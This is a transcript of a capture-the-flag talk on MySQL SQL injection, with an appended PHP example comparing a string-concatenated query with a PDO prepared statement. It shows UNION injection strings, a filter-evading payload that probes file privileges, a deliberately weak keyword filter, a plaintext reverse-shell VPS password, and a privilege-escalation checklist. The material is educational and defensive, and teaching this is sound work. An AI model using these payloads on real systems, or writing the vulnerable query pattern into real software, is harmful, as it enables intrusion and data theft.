
Omega CTF Presentation

The presentation of the Omega CTF 2019.

Osanda Malith Jayathissa

July 27, 2019

Transcript

  1. RULES
     • No DDoSing the servers
     • You can use whatever tools you want
     • Goal is to exploit the web app and root the box, then capture the flag inside the /root/ folder
     • Credentials for a temporary VPS to get a reverse shell: [email protected]:ilovelinux123
  2. ABOUT ME
     Not any geek or any nerd ;-) https://osandamalith.com
     • Passionate about Penetration Testing and Reverse Engineering
     • IT Security Consultant at ZeroDayLab, London
     • Currently holds: OSCE, OSCP, OSWP, CREST CRTPEN, eCRE, eWPTX, eCPPTX, eCPPT
     • Author of a few vulnerabilities and 0days: https://www.exploit-db.com/?author=6712
     • I love to make things, break things and make things that break things ;)
     • DJ at Ministry of Sound, London, UK
  3. SQL Injection
     • Intention: Extracting data, Bypassing Auth, Priv Esc, etc.
     • Source of Vulnerability: User input, HTTP headers, second order injection, Files, etc.
     • Exploitation Technique: Inband, Out-of-Band, Inference
  4. MY ERROR BASED RESEARCH
     • Error Based SQL Injection Using EXP
       • https://osandamalith.com/2015/07/15/error-based-sql-injection-using-exp/
       • https://www.exploit-db.com/papers/37953
     • BIGINT Overflow Error Based SQL Injection
       • https://osandamalith.com/2015/07/08/bigint-overflow-error-based-sql-injection/
       • https://www.exploit-db.com/papers/37733
  5. MYSQL OUT OF BAND HACKING
     • https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/
     • https://www.exploit-db.com/papers/41273
     • https://packetstormsecurity.com/files/140832/MySQL-OOB-Hacking.html
  6. VULNERABLE QUERY
     • $query = "SELECT id,name,join_date,title FROM members WHERE name = '" . $member_name . "';";
     • SELECT id,name,join_date,title FROM members WHERE name = 'Ergo';
     • SELECT id,name,join_date,title FROM members WHERE name = 'Ergo' UNION SELECT 1,2,3,4;
     • SELECT id,name,join_date,title FROM members WHERE name = 'Ergo' UNION SELECT @@version,2,3,4;
  7. WAFS!
     if (isset($_REQUEST['member_name']) && $_REQUEST['member_name'] !== '') {
         $member_name = $_REQUEST['member_name'];
         $member_name = preg_replace("/union|select/i", "", $member_name);
         $member_name = preg_replace("/into|outfile|dumpfile|[#]|[--]/i", "nope", $member_name);
         $member_name = preg_replace("(or|and|OR|AND)", "nope", $member_name);
         $connection = @mysqli_connect(MYSQLHOST, MYSQLUSER, MYSQLPASS, MYSQLDB);
  8. WHEN /OR/i IS FILTERED
     • https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/
     • https://www.exploit-db.com/papers/41274
     • https://packetstormsecurity.com/files/140831/Alternative-For-Information_Schema.Tables-In-MySQL.html
  9. MYSQL PRIVILEGES
     • File_priv
       • Enables reading and writing files on the server host using the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. A user who has the FILE privilege can read any file on the server host that is either world-readable or readable by the MySQL server. (This implies the user can read any file in any database directory, because the server can access any of those files.)
       • Enables creating new files in any directory where the MySQL server has write access. This includes the server's data directory containing the files that implement the privilege tables.
  10. CHECKING File_priv
     • select File_priv from mysql.user where user = substring_index(user(), '@', 1);
     • null'unUNIONiOn/**/selSELECTeCt/**/1,File_Priv,3,4/**/from/**/mysql.user/**/where/**/user=substring_index(user(),'@',1)&&1='1
  11. ROOT THE BOX! PRIVILEGE ESCALATION
     • System and network information
     • User information
     • Privileged Access / Cleartext credentials
     • Services
     • Jobs/Tasks
     • Installed software version information
  12. SQLI PREVENTION
     • Use prepared statements and parameterized queries
     • Using PHP Data Objects (PDO)
         $stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name');
         $stmt->execute(array('name' => $name));
         foreach ($stmt as $row) {
             // Do something with $row
         }
     • Supports any database driver and is the universal option.
  13. SQLI PREVENTION
     • Using MySQLi Extension (MySQL Improved)
         $stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?');
         $stmt->bind_param('s', $name); // 's' specifies the variable type => 'string'
         $stmt->execute();
         $result = $stmt->get_result();
         while ($row = $result->fetch_assoc()) {
             // Do something with $row
         }
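As an added example (not code from the deck or its author), the following PHP script puts the string-concatenated members lookup from slide 6 next to the PDO prepared-statement version from slide 12 and runs both against the same data, so the effect of parameterization can be seen directly. It uses an in-memory SQLite database through PDO purely so that it runs offline without a MySQL server; the table name, columns and rows are constructed for the demo, and the only assumption is that the pdo_sqlite extension is loaded (for MySQL only the DSN and credentials would change).

```php
<?php
// Added example, not from the Omega CTF deck. Vulnerable vs. parameterized
// members lookup, run against a constructed in-memory SQLite table via PDO.
// Assumes the pdo_sqlite extension is available.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed sample schema and rows mirroring the deck's members table.
$pdo->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, name TEXT, join_date TEXT, title TEXT)');
$pdo->exec("INSERT INTO members (name, join_date, title) VALUES
            ('Ergo',  '2019-07-27', 'Member'),
            ('Alice', '2019-01-01', 'Admin')");

// Vulnerable: the caller's string is spliced into the SQL text (slide 6 pattern),
// so a quote in the input ends the literal and the rest is parsed as SQL.
function findMemberVulnerable(PDO $pdo, string $memberName): array
{
    $query = "SELECT id,name,join_date,title FROM members WHERE name = '" . $memberName . "'";
    return $pdo->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the SQL text is fixed at prepare() time and the value is bound as
// data (slide 12 pattern); the database never parses it as part of the query.
function findMemberSafe(PDO $pdo, string $memberName): array
{
    $stmt = $pdo->prepare('SELECT id,name,join_date,title FROM members WHERE name = :name');
    $stmt->execute(['name' => $memberName]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$benign  = 'Ergo';
$payload = "Ergo' UNION SELECT 1,2,3,'4";   // the UNION shape shown on slide 6

foreach (['vulnerable' => 'findMemberVulnerable', 'safe' => 'findMemberSafe'] as $label => $fn) {
    foreach (['benign' => $benign, 'payload' => $payload] as $kind => $input) {
        $rows = $fn($pdo, $input);
        printf("%-10s %-7s -> %d row(s)\n", $label, $kind, count($rows));
        foreach ($rows as $row) {
            printf("    %s\n", json_encode($row));
        }
    }
}
```

Run it with `php example.php`. The vulnerable function returns the Ergo row for the benign name and an additional attacker-shaped row for the UNION input, because the spliced quote turns the input into a second SELECT; the prepared version returns the Ergo row for the benign name and nothing at all for the UNION input, since it simply looks for a member whose name is that literal string. This is the whole reason slides 12 and 13 recommend prepared statements over the keyword-stripping WAF on slide 7: the fix removes the parsing problem rather than trying to enumerate bad inputs.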